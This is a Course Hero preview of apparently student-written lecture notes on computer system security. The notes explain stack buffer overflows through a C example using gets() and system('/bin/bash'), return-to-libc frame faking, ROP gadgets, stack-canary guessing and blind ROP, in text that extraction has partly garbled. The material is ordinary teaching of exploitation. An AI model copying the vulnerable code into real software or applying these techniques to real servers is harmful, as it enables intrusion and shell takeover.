Offset size zero addr COMPUTER SYSTEM SECURITY Void runshell systembinbash void

Offset size zero addr computer system security void

This preview shows page 13 - 20 out of 22 pages.

Offset size zero addr
Image of page 13
COMPUTER SYSTEM SECURITY Void run_shell(){ system(“/bin/bash”); } void process_msg(){ char buf[128]; gets(buf); } How can the attacker invoke the run_shell command? Attacker can do a couple of things: (1) he can disassamble the program, run in gdb , find out the address in the executable (2) Then during the buffer overflow the attacker can essentialy take that address put it in buffer overflow thats generated and make sure that the function return to the run shell. entry %rbp put add of run_shell ret address entry %esp saved %ebp new %rbp buf[127] buf[0] new %es
Image of page 14
COMPUTER SYSTEM SECURITY char *bash_path = “/bin/bash” Void run_boring(){ system(“/bin/ls”); } void process_msg(){ char buf[128]; gets(buf); } How dp we invoke a system call with an argument of our choice? By faking a calling frame for system argument system arg return address where system should return to %esp
Image of page 15
COMPUTER SYSTEM SECURITY entry %rbp addr of bash path put add of junk return addr. run_shell ret address addr. Of system entry %esp saved %ebp new %rbp buf[127] buf[0] new %es What if the string containing the path is not in the program?
Image of page 16
COMPUTER SYSTEM SECURITY /0 /pat entry %rbp /bin addr of bash path put add of junk return addr. run_shell ret address addr. Of system entry %esp saved %ebp new %rbp buf[127] buf[0] new %es What if we want to call system arbitrary number of times? We need to find the address of these two opcodes: pop %eax // pop TOS ----> %eax ret // pop TOS -----> %eip The above is called as gadget (small set of assembly instruction attacker can use) How can we find these gadgets? There are some off the shelf tools
Image of page 17
COMPUTER SYSTEM SECURITY addr of bash path addr. Of pop .ret gadget addr. Of system addr of bash path put add of addr. Of pop .ret gadget run_shell ret address addr. Of system entry %esp saved %ebp new %rbp buf[127] buf[0] new %es So in this way we can repeat this arbitrary number of times. Now whats interesting is we are not executing anything on the stack but jumping arbitrarily. (with respect to that executable bit set to 0) So in essence what ROP does is it uses stack pointer as instruction pointer Nest how to defeat stack canaries? Can we guess the canaries? Assum. (1) server has buffer overflow vulnerabilty
Image of page 18
COMPUTER SYSTEM SECURITY (2) The server is going to crash and restart if bad canary (3) After the restart, the canary + ASLR is not re-randomized. Why does the above assum hold true? Bcoz lot of servers are written to use fork to create new processes and in fork the child inherits the address layout of the parent Now we can iteratively guess the canary bytes. BROP(blind return oriented programming) (1) Find a stop gadget,( a return address to siome place in the code that if you jump to will pause the program but not crashes the program ) (2) Find gadgets that pop stack entries. Sequence to find stack-gadget: Probe addr : addr of potential stack poping gadgets stop addr : addr of stop gadget crash addr: addr of non-executable code(0x0) e.g. probe: 0x4 .... 8 0x4 .... c pop rax; trap: 0x0 0x0 ret; stop: 0x5 0x5 ------> (sleep(10)) xor rax, rax; ret; (3) Determine which registers the pop gadgets use.(can make use of the pause instruction) Now to find pause instrtuctions, we can chain all of these pop gadgets in such a way that we put all of them on the stack ,in between each one of them we put the syscall number for pause, and then we see if we can actually get the program to hang.
Image of page 19
Image of page 20

You've reached the end of your free preview.

Want to read all 22 pages?

  • Fall '16
  • Piyush Rai
  • Pointer

What students are saying

  • Left Quote Icon

    As a current student on this bumpy collegiate pathway, I stumbled upon Course Hero, where I can find study resources for nearly all my courses, get online help from tutors 24/7, and even share my old projects, papers, and lecture notes with other students.

    Student Picture

    Kiran Temple University Fox School of Business ‘17, Course Hero Intern

  • Left Quote Icon

    I cannot even describe how much Course Hero helped me this summer. It’s truly become something I can always rely on and help me. In the end, I was not only able to survive summer classes, but I was able to thrive thanks to Course Hero.

    Student Picture

    Dana University of Pennsylvania ‘17, Course Hero Intern

  • Left Quote Icon

    The ability to access any university’s resources through Course Hero proved invaluable in my case. I was behind on Tulane coursework and actually used UCLA’s materials to help me move forward and get everything together on time.

    Student Picture

    Jill Tulane University ‘16, Course Hero Intern

Ask Expert Tutors You can ask You can ask ( soon) You can ask (will expire )
Answers in as fast as 15 minutes